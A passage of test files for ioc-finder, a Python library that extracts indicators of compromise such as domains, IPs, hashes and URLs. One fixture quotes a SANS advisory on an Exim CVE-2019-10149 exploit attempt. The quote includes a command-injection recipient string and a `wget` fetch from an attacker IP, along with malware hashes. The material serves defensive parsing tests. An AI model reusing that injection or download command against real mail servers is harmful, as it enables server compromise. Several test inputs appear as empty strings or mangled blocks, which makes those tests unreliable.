 93 |     print(result.output.strip())
 94 |     json_results = json.loads(result.output.strip())
 95 |     assert "example.com" in json_results["domains"]
 96 |     assert "example.org" in json_results["domains"]
 97 |     assert "example.org/test/bingo.php" in json_results["urls"]
 98 | 
 99 | 
100 | def test_cli_disabling_parsing_urls_without_scheme():
101 |     runner = CliRunner()
102 |     result = runner.invoke(
103 |         ioc_finder.cli_find_iocs,
104 |         ["This is just an example.com example.org/test/bingo.php", "--parse_urls_without_scheme"],
105 |     )
106 |     assert result.exit_code == 0
107 |     print(result.output.strip())
108 |     json_results = json.loads(result.output.strip())
109 |     assert "example.com" in json_results["domains"]
110 |     assert "example.org" in json_results["domains"]
111 | 
112 | 
113 | def test_cli_disabling_import_hash_parsing():
114 |     runner = CliRunner()
115 |     result = runner.invoke(ioc_finder.cli_find_iocs, ["imphash 18ddf28a71089acdbab5038f58044c0a", "--no_import_hashes"])
116 |     assert result.exit_code == 0
117 |     json_results = json.loads(result.output.strip())
118 |     # even if we don't parse imphashes, they are still removed so they aren't parsed as md5s
119 |     assert json_results["md5s"] == []
120 |     assert not json_results.get("imphashes")
121 | 
122 |     result = runner.invoke(ioc_finder.cli_find_iocs, ["imphash 18ddf28a71089acdbab5038f58044c0a"])
123 |     assert result.exit_code == 0
124 |     json_results = json.loads(result.output.strip())
125 |     assert json_results["imphashes"] == ["18ddf28a71089acdbab5038f58044c0a"]
126 | 


--------------------------------------------------------------------------------
/tests/test_concurrency.py:
--------------------------------------------------------------------------------
 1 | import concurrent.futures
 2 | 
 3 | from ioc_finder import find_iocs
 4 | 
 5 | 
 6 | def test_nested_concurrency():
 7 |     texts = ["example.com", "foo bar bang buzz", "This is just an example.com https://example.org/test/bingo.php"]
 8 |     results = []
 9 | 
10 |     with concurrent.futures.ThreadPoolExecutor() as executor:
11 |         results = [i for i in executor.map(find_iocs, texts)]
12 | 
13 |     assert results[0]["domains"] == ["example.com"]
14 |     assert "example.com" in results[2]["domains"]
15 |     assert "example.org" in results[2]["domains"]
16 |     assert results[2]["urls"] == ["https://example.org/test/bingo.php"]
17 | 


--------------------------------------------------------------------------------
/tests/test_edge_cases.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | import pytest
  4 | 
  5 | from ioc_finder import find_iocs
  6 | 
  7 | 
  8 | @pytest.fixture
  9 | def text_a():
 10 |     """Provide some generic text for the tests below."""
 11 |     return "example.com is a nice domain if you consider http://bad.com/test/bingo.php to be bad. {} {} {} 1.2.3.4 192.64.55.61 bad12312@example.org".format(
 12 |         "a" * 32, "b" * 40, "c" * 64
 13 |     )
 14 | 
 15 | 
 16 | def test_domain_name_with_underscore():
 17 |     # see https://github.com/fhightower/ioc-finder/issues/26
 18 |     s = "o_o.lgms.nl"
 19 |     results = find_iocs(s)
 20 |     assert results["domains"] == ["o_o.lgms.nl"]
 21 | 
 22 |     s = "_jabber._tcp.gmail.com"
 23 |     results = find_iocs(s)
 24 |     assert results["domains"] == ["_jabber._tcp.gmail.com"]
 25 | 
 26 | 
 27 | def test_url_with_underscore_in_subdomain():
 28 |     # see https://github.com/fhightower/ioc-finder/issues/26
 29 |     s = "https://o_o.lgms.nl/"
 30 |     results = find_iocs(s)
 31 |     assert results["urls"] == ["https://o_o.lgms.nl/"]
 32 | 
 33 | 
 34 | def test_ioc_finder(text_a):
 35 |     iocs = find_iocs(text_a)
 36 |     assert len(iocs["domains"]) == 3
 37 |     assert "example.com" in iocs["domains"]
 38 |     assert "example.org" in iocs["domains"]
 39 |     assert "bad.com" in iocs["domains"]
 40 | 
 41 |     assert iocs["email_addresses_complete"] == ["bad12312@example.org"]
 42 | 
 43 |     assert len(iocs["ipv4s"]) == 2
 44 |     assert "1.2.3.4" in iocs["ipv4s"]
 45 |     assert "192.64.55.61" in iocs["ipv4s"]
 46 | 
 47 |     assert iocs["urls"] == ["http://bad.com/test/bingo.php"]
 48 |     assert iocs["md5s"] == ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]
 49 |     assert iocs["sha1s"] == ["bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"]
 50 |     assert iocs["sha256s"] == ["cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc"]
 51 | 
 52 | 
 53 | def test_url_parsing():
 54 |     """Test some specific url examples."""
 55 |     s = "https://github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"
 56 |     iocs = find_iocs(s)
 57 |     assert iocs["urls"] == ["https://github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"]
 58 | 
 59 |     s = ''
 60 |     iocs = find_iocs(s)
 61 |     assert "http://fonts.googleapis.com/css?family=Lato:400,700" in iocs["urls"]
 62 | 
 63 |     s = ''
 64 |     iocs = find_iocs(s)
 65 |     assert "http://fonts.googleapis.com/css?family=Lato:400,700" in iocs["urls"]
 66 | 
 67 |     s = ''
 68 |     results = find_iocs(s)
 69 |     assert results["urls"] == ["https://bit.ly/12345#abcd"]
 70 | 
 71 |     s = ''
 72 |     results = find_iocs(s)
 73 |     assert results["urls"] == ["https://bit.ly/12345"]
 74 | 
 75 |     s = ''
 76 |     results = find_iocs(s)
 77 |     assert results["urls"] == ["https://bit.ly"]
 78 | 
 79 |     s = ''
 80 |     results = find_iocs(s)
 81 |     assert results["urls"] == ["https://bit.ly/"]
 82 | 
 83 |     s = "http://example.com//test"
 84 |     results = find_iocs(s)
 85 |     assert results["urls"] == ["http://example.com//test"]
 86 | 
 87 | 
 88 | def test_issue_45_url_parsing():
 89 |     s = "http://wmfolcs3.pn.4y.nv.kr2x1dt.net/gz+/(y%40%26//%3c7aew%5cqv%0a/%0bcz,r/r%5c%7b/7re//6%3e/f%23%7ce0p'6_%09/d%5c"
 90 |     results = find_iocs(s)
 91 |     assert results["urls"] == [
 92 |         "http://wmfolcs3.pn.4y.nv.kr2x1dt.net/gz+/(y%40%26//%3c7aew%5cqv%0a/%0bcz,r/r%5c%7b/7re//6%3e/f%23%7ce0p'6_%09/d%5c"
 93 |     ]
 94 | 
 95 | 
 96 | def test_schemeless_url_parsing():
 97 |     """Test parsing URLs without a scheme."""
 98 |     s = "github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"
 99 |     iocs = find_iocs(s)
100 |     assert iocs["urls"] == ["github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"]
101 | 
102 |     s = "github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh hightower.space/projects"
103 |     iocs = find_iocs(s)
104 |     assert len(iocs["urls"]) == 2
105 |     assert "hightower.space/projects" in iocs["urls"]
106 |     assert "github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh" in iocs["urls"]
107 | 
108 |     s = "https://github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh hightower.space/projects"
109 |     iocs = find_iocs(s, parse_urls_without_scheme=False)
110 |     assert iocs["urls"] == ["https://github.com/StylishThemes/GitHub-Dark/blob/master/tools/authors.sh"]
111 | 
112 | 
def test_address_email_address():
    """Check email addresses whose domain part is a bracketed IP address literal."""
    # Each entry pairs an input text with the exact result lists expected for it.
    cases = [
        (
            ">test@[192.168.2.1]<",
            {
                "email_addresses_complete": ["test@[192.168.2.1]"],
                "email_addresses": ["test@[192.168.2.1]"],
                "ipv4s": ["192.168.2.1"],
            },
        ),
        (
            "bad@[192.168.7.3]",
            {
                "ipv4s": ["192.168.7.3"],
                "email_addresses_complete": ["bad@[192.168.7.3]"],
                "email_addresses": ["bad@[192.168.7.3]"],
            },
        ),
        (
            "bad@[192.168.7.3]aaaaa",
            {
                "email_addresses_complete": ["bad@[192.168.7.3]"],
                "email_addresses": ["bad@[192.168.7.3]"],
            },
        ),
        (
            "jsmith@[IPv6:2001:db8::1]",
            {
                "email_addresses_complete": ["jsmith@[IPv6:2001:db8::1]"],
                "email_addresses": ["jsmith@[IPv6:2001:db8::1]"],
                "ipv6s": ["2001:db8::1"],
            },
        ),
    ]

    for text, expected_by_key in cases:
        found = find_iocs(text)
        for key, expected in expected_by_key.items():
            assert found[key] == expected
136 | 
137 | 
def test_address_domain_url():
    """Check that a URL with an IPv4 host yields both the URL and the address."""
    url = "http://192.64.55.61/test.php"
    found = find_iocs(url)
    assert found["urls"] == [url]
    assert found["ipv4s"] == ["192.64.55.61"]
143 | 
144 | 
def test_url_domain_name_parsing():
    """Check that the host of a URL is also reported as a domain."""
    url = "http://foo.youtube/test.php"
    found = find_iocs(url)
    assert found["urls"] == [url]
    assert found["domains"] == ["foo.youtube"]
150 | 
151 | 
def test_ioc_deduplication():
    """Check that a domain appearing twice in the text is returned once."""
    repeated_domain = "example.com example.com"
    domains = find_iocs(repeated_domain)["domains"]
    assert domains == ["example.com"]
156 | 
157 | 
def test_file_hash_order():
    """Check that a 32-char and a 40-char hex run land first in ``md5s`` and ``sha1s`` respectively."""
    md5_run = "a" * 32
    sha1_run = "b" * 40
    found = find_iocs("{} {}".format(md5_run, sha1_run))
    assert found["md5s"][0] == md5_run
    assert found["sha1s"][0] == sha1_run
163 | 
164 | 
def test_file_hash_parsing():
    """Check which surrounding characters still allow a hash to be reported."""
    md5_run = "a" * 32

    # a hash glued directly onto the preceding word is not reported
    glued = find_iocs("this is a test{}".format(md5_run))
    assert glued["md5s"] == []

    # a leading space, surrounding double quotes, or a trailing period keep the hash detectable
    for template in ("this is a test {}", 'this is a test "{}"', "this is a test {}."):
        found = find_iocs(template.format(md5_run))
        assert found["md5s"] == [md5_run]

    # a "0x" prefix is not part of the reported sha1
    prefixed = find_iocs("0x1a1db93766e31994507511c9c70a1dd94465cf6d")
    assert prefixed["sha1s"] == ["1a1db93766e31994507511c9c70a1dd94465cf6d"]
185 | 
186 | 
187 | def test_url_boundaries():
188 |     """Make sure the boundaries for a url are correct."""
189 |     s = """http://192.168.0.1/test/bad.html
""" 190 | iocs = find_iocs(s) 191 | assert iocs["urls"] == ["http://192.168.0.1/test/bad.html"] 192 | 193 | s = """
194 |
""" 195 | iocs = find_iocs(s) 196 | assert "https://i.imgur.com/abc.png#4827766048" in iocs["urls"] 197 | assert "https://i.imgur.com/def.png#4827766048" in iocs["urls"] 198 | assert len(iocs["urls"]) == 2 199 | 200 | s = """
""" 201 | iocs = find_iocs(s) 202 | assert iocs["urls"] == ["https://i.imgur.com/abc.png"] 203 | 204 | s = """(https://i.imgur.com/abc.png)""" 205 | iocs = find_iocs(s) 206 | assert iocs["urls"] == ["https://i.imgur.com/abc.png"] 207 | 208 | s = """(https://i.imgur.com/abc.png#abc)""" 209 | iocs = find_iocs(s) 210 | assert iocs["urls"] == ["https://i.imgur.com/abc.png#abc"] 211 | 212 | s = """[https://i.imgur.com/abc.png](https://i.imgur.com/abc.png)""" 213 | iocs = find_iocs(s) 214 | assert iocs["urls"] == ["https://i.imgur.com/abc.png"] 215 | 216 | s = """[https://i.imgur.com/abc.png#abc](https://i.imgur.com/abc.png#abc)""" 217 | iocs = find_iocs(s) 218 | assert iocs["urls"] == ["https://i.imgur.com/abc.png#abc"] 219 | 220 | 221 | def test_domain_parsing(): 222 | s = "Host: dfasdfa (mz-fcb301p.ocn.ad.jp asdfsdafs" 223 | iocs = find_iocs(s) 224 | assert iocs["domains"] == ["mz-fcb301p.ocn.ad.jp"] 225 | 226 | s = "smtp.mailfrom" 227 | iocs = find_iocs(s) 228 | assert iocs["domains"] == [] 229 | 230 | s = "bar.com" 231 | iocs = find_iocs(s) 232 | assert iocs["domains"] == ["bar.com"] 233 | 234 | s = 'bar.com"' 235 | iocs = find_iocs(s) 236 | assert iocs["domains"] == ["bar.com"] 237 | 238 | s = "bar.com'" 239 | iocs = find_iocs(s) 240 | assert iocs["domains"] == ["bar.com"] 241 | 242 | s = "bar.com." 
243 | iocs = find_iocs(s) 244 | assert iocs["domains"] == ["bar.com"] 245 | 246 | # make sure domains of different casings are properly parsed: https://github.com/fhightower/ioc-finder/issues/47 247 | iocs = find_iocs("BAR.com") 248 | assert iocs["domains"] == ["bar.com"] 249 | iocs = find_iocs("bar.COM") 250 | assert iocs["domains"] == ["bar.com"] 251 | iocs = find_iocs("BAR.COM") 252 | assert iocs["domains"] == ["bar.com"] 253 | 254 | 255 | def test_email_address_parsing(): 256 | s = 'my email is: foo"bar@gmail.com' 257 | iocs = find_iocs(s) 258 | assert iocs["email_addresses_complete"] == ['foo"bar@gmail.com'] 259 | assert iocs["email_addresses"] == ["bar@gmail.com"] 260 | 261 | s = "Abc\\@def@example.com" 262 | iocs = find_iocs(s) 263 | print(iocs["email_addresses_complete"]) 264 | print(iocs["email_addresses"]) 265 | assert iocs["email_addresses_complete"] == ["Abc\\@def@example.com"] 266 | assert iocs["email_addresses"] == ["def@example.com"] 267 | 268 | s = 'foobar@gmail.com"' 269 | iocs = find_iocs(s) 270 | assert iocs["email_addresses_complete"] == ["foobar@gmail.com"] 271 | assert iocs["email_addresses"] == ["foobar@gmail.com"] 272 | 273 | s = "foobar@gmail.comahhhhhhhh" 274 | iocs = find_iocs(s) 275 | assert iocs["email_addresses_complete"] == [] 276 | assert iocs["email_addresses"] == [] 277 | 278 | s = '"foobar@gmail.com' 279 | iocs = find_iocs(s) 280 | assert iocs["email_addresses_complete"] == ['"foobar@gmail.com'] 281 | assert iocs["email_addresses"] == ["foobar@gmail.com"] 282 | 283 | s = "smtp.mailfrom=example@example.com" 284 | iocs = find_iocs(s) 285 | assert iocs["email_addresses_complete"] == ["smtp.mailfrom=example@example.com"] 286 | assert iocs["email_addresses"] == ["example@example.com"] 287 | 288 | s = '"foo@bar.com"' 289 | iocs = find_iocs(s) 290 | assert iocs["email_addresses_complete"] == ['"foo@bar.com'] 291 | assert iocs["email_addresses"] == ["foo@bar.com"] 292 | 293 | # making sure that the `parse_domain_from_email_address` 
argument is working properly 294 | s = "foo@bar.com." 295 | iocs = find_iocs(s, parse_domain_from_email_address=False) 296 | assert iocs["email_addresses"] == ["foo@bar.com"] 297 | assert iocs["domains"] == [] 298 | 299 | s = '"foo@bar.com' 300 | iocs = find_iocs(s) 301 | assert iocs["email_addresses"] == ["foo@bar.com"] 302 | 303 | # validating https://github.com/fhightower/ioc-finder/issues/40 is fixed 304 | s = "-----foo@bar.com" 305 | iocs = find_iocs(s) 306 | assert iocs["email_addresses"] == ["foo@bar.com"] 307 | 308 | s = "foo-burt@bar.com f-1@bar.com" 309 | iocs = find_iocs(s) 310 | assert len(iocs["email_addresses"]) == 2 311 | assert "foo-burt@bar.com" in iocs["email_addresses"] 312 | assert "f-1@bar.com" in iocs["email_addresses"] 313 | 314 | 315 | def test_erroneous_ip_address_parsing(): 316 | # the two tests below make sure that IP addresses are not parsed from strings with decimals in them 317 | s = "2018.12.15.14.05.43" 318 | iocs = find_iocs(s) 319 | assert iocs["ipv4s"] == [] 320 | 321 | s = "111.12.15.14.05.43" 322 | iocs = find_iocs(s) 323 | assert iocs["ipv4s"] == [] 324 | 325 | s = ".18.12.15.14" 326 | iocs = find_iocs(s) 327 | assert iocs["ipv4s"] == [] 328 | 329 | s = "18.12.15.1411111111" 330 | iocs = find_iocs(s) 331 | assert iocs["ipv4s"] == [] 332 | 333 | s = "018.12.15.14" 334 | iocs = find_iocs(s) 335 | assert iocs["ipv4s"] == ["18.12.15.14"] 336 | 337 | s = "18.12.15.14." 
338 | iocs = find_iocs(s) 339 | assert iocs["ipv4s"] == ["18.12.15.14"] 340 | 341 | # the three tests below make sure that IP addresses are not parsed from sequences with large numbers in them 342 | s = "1112.15.14.05" 343 | iocs = find_iocs(s) 344 | assert iocs["ipv4s"] == [] 345 | 346 | s = "15.1112.14.05" 347 | iocs = find_iocs(s) 348 | assert iocs["ipv4s"] == [] 349 | 350 | s = "15.14.05.1112" 351 | iocs = find_iocs(s) 352 | assert iocs["ipv4s"] == [] 353 | 354 | 355 | def test_ip_address_systematically(): 356 | # TODO: for many of the assertions below, I would like to be more explicit; I would like to change tests like `len(iocs['ipv4s']) == 1` to `iocs['ipv4s'] == ['1.1.1.1']` 357 | s = "1.1.1.1" 358 | iocs = find_iocs(s) 359 | assert iocs["ipv4s"] == ["1.1.1.1"] 360 | 361 | s = ".1.1.1.1" 362 | iocs = find_iocs(s) 363 | assert iocs["ipv4s"] == [] 364 | 365 | # I would like to match in this situation to capture ip address that are at the end of a sentence 366 | s = "1.1.1.1." 367 | iocs = find_iocs(s) 368 | assert iocs["ipv4s"] == ["1.1.1.1"] 369 | 370 | s = ".1.1.1.1." 371 | iocs = find_iocs(s) 372 | assert iocs["ipv4s"] == [] 373 | 374 | s = "1.1.1.1.1" 375 | iocs = find_iocs(s) 376 | assert iocs["ipv4s"] == [] 377 | 378 | s = ".1.1.1.1.1" 379 | iocs = find_iocs(s) 380 | assert iocs["ipv4s"] == [] 381 | 382 | s = "1.1.1.1.1." 383 | iocs = find_iocs(s) 384 | assert iocs["ipv4s"] == [] 385 | 386 | s = ".1.1.1.1.1." 
387 | iocs = find_iocs(s) 388 | assert iocs["ipv4s"] == [] 389 | 390 | s = "1.1.1.1.1.1" 391 | iocs = find_iocs(s) 392 | assert iocs["ipv4s"] == [] 393 | 394 | s = "1.1.1.1.a" 395 | iocs = find_iocs(s) 396 | assert iocs["ipv4s"] == [] 397 | 398 | s = "1.01.1.1" 399 | iocs = find_iocs(s) 400 | assert iocs["ipv4s"] == ["1.1.1.1"] 401 | 402 | s = "01.1.1.1" 403 | iocs = find_iocs(s) 404 | assert iocs["ipv4s"] == ["1.1.1.1"] 405 | 406 | s = "01.01.1.1" 407 | iocs = find_iocs(s) 408 | assert iocs["ipv4s"] == ["1.1.1.1"] 409 | 410 | s = "0001.1.1.1" 411 | iocs = find_iocs(s) 412 | assert iocs["ipv4s"] == [] 413 | 414 | 415 | def test_onion_parsing(): 416 | s = "foo.onion" 417 | iocs = find_iocs(s) 418 | assert iocs["domains"] == ["foo.onion"] 419 | 420 | s = "http://foo.onion/test" 421 | iocs = find_iocs(s) 422 | assert iocs["urls"] == ["http://foo.onion/test"] 423 | assert iocs["domains"] == ["foo.onion"] 424 | 425 | 426 | def test_deduplication_of_indicators_with_different_cases(): 427 | s = "example.com Example.com exAmplE.com" 428 | iocs = find_iocs(s) 429 | assert iocs["domains"] == ["example.com"] 430 | 431 | s = "bad@example.com bad@Example.com bad@exAmplE.com" 432 | iocs = find_iocs(s) 433 | assert iocs["email_addresses"] == ["bad@example.com"] 434 | 435 | s = "bad@example.com Bad@example.com" 436 | iocs = find_iocs(s) 437 | assert iocs["email_addresses"] == ["bad@example.com"] 438 | 439 | s = "http://example.com/test http://EXAMple.com/test" 440 | iocs = find_iocs(s) 441 | assert iocs["urls"] == ["http://example.com/test"] 442 | 443 | s = "http://example.com/test http://EXAMple.com/TEST" 444 | iocs = find_iocs(s) 445 | assert len(iocs["urls"]) == 2 446 | assert "http://example.com/test" in iocs["urls"] 447 | assert "http://example.com/TEST" in iocs["urls"] 448 | 449 | 450 | def test_google_adsense_publisher_ids(): 451 | s = "PUB-1234567891234567" 452 | iocs = find_iocs(s) 453 | assert iocs["google_adsense_publisher_ids"] == ["pub-1234567891234567"] 454 | 455 | s 
= "pUb-1234567891234567" 456 | iocs = find_iocs(s) 457 | assert iocs["google_adsense_publisher_ids"] == [] 458 | 459 | s = "PUB-1234567891234567" 460 | iocs = find_iocs(s) 461 | assert iocs["google_adsense_publisher_ids"] == ["pub-1234567891234567"] 462 | 463 | 464 | def test_google_analyitics_tracker_ids(): 465 | s = "ua-000000-1" 466 | iocs = find_iocs(s) 467 | assert iocs["google_analytics_tracker_ids"] == ["UA-000000-1"] 468 | 469 | s = "uA-000000-1" 470 | iocs = find_iocs(s) 471 | assert iocs["google_analytics_tracker_ids"] == [] 472 | 473 | s = "UA-000000-1" 474 | iocs = find_iocs(s) 475 | assert iocs["google_analytics_tracker_ids"] == ["UA-000000-1"] 476 | 477 | 478 | def test_google_casing_deduplication(): 479 | s = "pub-1234567891234567 PUB-1234567891234567 pUb-1234567891234567" 480 | iocs = find_iocs(s) 481 | assert iocs["google_adsense_publisher_ids"] == ["pub-1234567891234567"] 482 | 483 | s = "UA-000000-1 ua-000000-1" 484 | iocs = find_iocs(s) 485 | assert iocs["google_analytics_tracker_ids"] == ["UA-000000-1"] 486 | 487 | 488 | def test_not_parsing_imphash(): 489 | s = "imphash 18ddf28a71089acdbab5038f58044c0a" 490 | iocs = find_iocs(s, parse_imphashes=False) 491 | assert "imphashes" not in iocs 492 | # even if we aren't parsing imphashes, they will still be removed and, thus, not parsed as md5s 493 | assert iocs["md5s"] == [] 494 | 495 | 496 | def test_not_parsing_authentihash(): 497 | s = "authentihash 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4" 498 | iocs = find_iocs(s, parse_authentihashes=False) 499 | assert "authentihashes" not in iocs 500 | # even if we aren't parsing authentihashes, they will still be removed and, thus, not parsed as sha256s 501 | assert iocs["sha256s"] == [] 502 | 503 | 504 | def test_mac_address_parsing(): 505 | s = "2019.02.15" 506 | iocs = find_iocs(s) 507 | assert iocs["mac_addresses"] == [] 508 | 509 | 510 | def test_unix_file_paths__not_detect_url(): 511 | # 
https://github.com/fhightower/ioc-finder/issues/42 512 | s = "https://twitter.com/" 513 | iocs = find_iocs(s) 514 | assert iocs["file_paths"] == [] 515 | 516 | 517 | def test_ipv6_parsing(): 518 | # https://github.com/fhightower/ioc-finder/issues/37 519 | s = "11:04:10 -0500" 520 | iocs = find_iocs(s) 521 | assert iocs["ipv6s"] == [] 522 | 523 | 524 | def test_ssdeep_parsing(): 525 | # https://github.com/fhightower/ioc-finder/issues/36 526 | s = "11:04:10 -0500" 527 | iocs = find_iocs(s) 528 | assert iocs["ssdeeps"] == [] 529 | 530 | 531 | def test_certificate_serial_number_issue_96(): 532 | # see https://github.com/fhightower/ioc-finder/issues/96 533 | s = """SolarWinds.Orion.Core.BusinessLayer.dll is signed by SolarWinds, using the certificate with serial number 0f:e9:73:75:20:22:a6:06:ad:f2:a3:6e:34:5d:c0:ed. The file was signed on March 24, 2020.""" 534 | observables = find_iocs(s) 535 | print(observables) 536 | assert observables["ipv6s"] == [] 537 | assert observables["mac_addresses"] == [] 538 | -------------------------------------------------------------------------------- /tests/test_execution_time.py: -------------------------------------------------------------------------------- 1 | import time 2 | 3 | from ioc_finder import ioc_finder 4 | 5 | 6 | def parse(): 7 | s = """209.217.225.74 port 80 - hotelesmeflo.com - GET /chachapoyas/wp-content/themes/sketch/msr.exe 8 | SHA256 hash: a666f74574207444739d9c896bc010b3fb59437099a825441e6c745d65807dfc (https://www.virustotal.com/gui/file/a666f74574207444739d9c896bc010b3fb59437099a825441e6c745d65807dfc/detection) 9 | 10 | File size: 9,261 bytes 11 | File description: Flash exploit used by Rig EK on 2019-06-17 12 | SHA256 hash: 2de435b78240c20dca9ae4c278417f2364849a5d134f5bb1ed1fd5791e3e36c5 (https://www.virustotal.com/gui/file/2de435b78240c20dca9ae4c278417f2364849a5d134f5bb1ed1fd5791e3e36c5/detection) 13 | 14 | File size: 354,304 bytes 15 | File description: Payload sent by Rig EK on 2019-06-17 (AZORult) 16 | 
SHA256 hash: a4f9ba5fce183d2dfc4dba4c40155c1a3a1b9427d7e4718ac56e76b278eb10d8 (https://www.virustotal.com/gui/file/a4f9ba5fce183d2dfc4dba4c40155c1a3a1b9427d7e4718ac56e76b278eb10d8/community) 17 | 18 | File size: 2,952,704 bytes 19 | File description: Follow-up malware hosted on URL at hotelesmeflo.com on 2019-06-17 20 | Final words 21 | 22 | My infected Windows host 23 | Published : 2019-06-19 24 | Last Updated : 2019-06-19 14:34:52 UTC 25 | by Johannes Ullrich (https://plus.google.com/101587262224166552564?rel=author) (Version: 1) 26 | 27 | Thanks to our reader Alex for sharing some of his mail logs with the latest attempts to exploit CVE-2019-10149 (https://isc.sans.edu/vuln.html?cve=2019-10149) (aka "Return of the Wizard"). The vulnerability affects Exim and was patched about two weeks ago. There are likely still plenty of vulnerable servers, but it looks like attackers are branching out and are hitting servers not running Exim as well. 28 | 29 | A couple of logs from our own mail server (running postfix): 30 | 31 | > Jun 19 10:47:10 mail postfix/smtp[19006]: A547240360F4: to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>, relay=204.51.94.153[204.51.94.153]:25, delay=0.82, delays=0.29/0.03/0.45/0.05, dsn=5.1.1, status=bounced (host 204.51.94.153[204.51.94.153] said: 550 5.1.1 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f70.91.145.10x22}}@dshield.org>: Recipient address rejected: User unknown in virtual alias table (in reply to RCPT TO command)) 32 | 33 | The exploit is attempting to run the following command: 34 | 35 | > /bin/sht-ct "wget 64.50.180.45/tmp/70.91.145.10" 36 | 37 | Note that the IP at the end of the command is our mail servers public IP address. The URL does no longer appear to exist and belongs to a server running cPanel. 38 | 39 | The beginning of the command may actually be a mistake/typo. I believe the attacker is trying to run sh -ct, which would execute the string (wget..). 
40 | 41 | --- 42 | Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute (https://sans.edu) 43 | Twitter (https://jbu.me/164) 44 | """ 45 | ioc_finder.find_iocs(s) 46 | 47 | 48 | # def test_execution_times(): 49 | # """Test how long it takes for the ioc finder package to run.""" 50 | # times = [] 51 | # n = 50 52 | 53 | # for i in range(0, n): 54 | # start_time = time.time() 55 | # parse() 56 | # end_time = time.time() 57 | # times.append(end_time - start_time) 58 | 59 | # print(times) 60 | # print('Average time: {}'.format(sum(times) / n)) 61 | # # fail the tests so that the times are printed 62 | # assert 1 == 2 63 | -------------------------------------------------------------------------------- /tests/test_find_iocs.py: -------------------------------------------------------------------------------- 1 | from typing import Dict 2 | 3 | import pytest 4 | 5 | from ioc_finder import find_iocs 6 | from ioc_finder.ioc_finder import IndicatorDict, IndicatorList 7 | 8 | from .find_iocs_cases import ALL_TESTS 9 | 10 | 11 | @pytest.mark.parametrize("text, results, args", ALL_TESTS) 12 | def test_find_iocs(text: str, results: Dict, args: Dict) -> None: 13 | # Parse input 14 | iocs = find_iocs(text, **args) 15 | 16 | for key, value in iocs.items(): 17 | # Compare lists 18 | if isinstance(value, list): 19 | _compare_lists(key, value, results.get(key, [])) 20 | # Compare sub dictionaries like for attack patterns 21 | elif isinstance(value, dict): 22 | _compare_dicts(key, value, results.get(key, {})) 23 | 24 | 25 | def _compare_lists(key_name: str, ioc_list: IndicatorList, result_list: IndicatorList) -> None: 26 | assert sorted(ioc_list) == sorted( 27 | result_list 28 | ), f"Unexpected result for key '[{key_name}]' -> Expected: '{result_list}' Received: '{ioc_list}'" 29 | 30 | 31 | def _compare_dicts(key_name: str, ioc_dict: IndicatorDict, result_dict: IndicatorDict) -> None: 32 | for ioc_key, ioc_value in ioc_dict.items(): 33 | if isinstance(ioc_value, 
list): 34 | _compare_lists(f"{key_name},{ioc_key}", ioc_value, result_dict.get(ioc_key, [])) 35 | -------------------------------------------------------------------------------- /tests/test_ioc_finder.py: -------------------------------------------------------------------------------- 1 | from ioc_finder import find_iocs 2 | 3 | 4 | def test_tlp_labels(): 5 | s = "tlp amber and TLP:RED" 6 | iocs = find_iocs(s) 7 | assert len(iocs["tlp_labels"]) == 2 8 | assert "TLP:RED" in iocs["tlp_labels"] 9 | assert "TLP:AMBER" in iocs["tlp_labels"] 10 | 11 | s = "tlp-Amber and TLPRED TlpGreen" 12 | iocs = find_iocs(s) 13 | assert len(iocs["tlp_labels"]) == 3 14 | assert "TLP:RED" in iocs["tlp_labels"] 15 | assert "TLP:AMBER" in iocs["tlp_labels"] 16 | assert "TLP:GREEN" in iocs["tlp_labels"] 17 | 18 | 19 | def test_domain_parsing(): 20 | s = "this is just a (google.com) test of example.com" 21 | iocs = find_iocs(s) 22 | assert len(iocs["domains"]) == 2 23 | assert "google.com" in iocs["domains"] 24 | 25 | 26 | def test_ipv4_parsing(): 27 | s = "this is just a (1.2.3.54) test of 255.255.1.255 255.256.344.1" 28 | iocs = find_iocs(s) 29 | assert len(iocs["ipv4s"]) == 2 30 | assert "1.2.3.54" in iocs["ipv4s"] 31 | assert "255.255.1.255" in iocs["ipv4s"] 32 | assert "255.256.344.1" not in iocs["ipv4s"] 33 | 34 | 35 | def test_ipv6_parsing(): 36 | s = "2001:0db8:0000:0000:0000:ff00:0042:8329 testing 2001:db8:0:0:0:ff00:42:8329 shfaldkafsdfa 2001:db8::ff00:42:8329 asdfadfas afkj;fl ::1 kljfkadf 1:1" 37 | iocs = find_iocs(s) 38 | assert len(iocs["ipv6s"]) == 4 39 | # TODO: the following 3 ipv6s addresses are the same representation of the same thing; I need to deduplicate these more thoroughly in the parsing function 40 | assert "2001:0db8:0000:0000:0000:ff00:0042:8329" in iocs["ipv6s"] 41 | assert "2001:db8:0:0:0:ff00:42:8329" in iocs["ipv6s"] 42 | assert "2001:db8::ff00:42:8329" in iocs["ipv6s"] 43 | assert "::1" in iocs["ipv6s"] 44 | assert "1:1" not in iocs["ipv6s"] 45 | 46 | 47 | 
